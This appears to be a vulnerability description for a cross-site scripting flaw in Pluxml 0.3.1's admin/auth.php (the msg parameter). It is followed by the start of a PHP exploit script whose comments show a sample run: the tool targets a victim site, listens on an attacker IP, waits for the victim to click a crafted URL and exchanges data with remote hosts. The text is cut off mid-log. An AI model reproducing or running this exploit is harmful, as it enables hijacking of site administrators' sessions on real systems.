Cross-site scripting (XSS) vulnerability in admin/auth.php in Pluxml 0.3.1 allows remote malicious users to inject arbitrary web script or HTML via the msg parameter.
<?php
# C:\> sploitphp -url victimcom/pluxml031/ -ip 902710196
# [/]Waiting for connection on 902710196:80/
# [!]Now you have to make the victim to click on the url
# [+]Received 395 bytes from 18226542:2007
# [+]Sending 366 bytes to 18226542:2007
# [+]Received 326 bytes from 18226542:2009
# [+]Sending 366 byt ...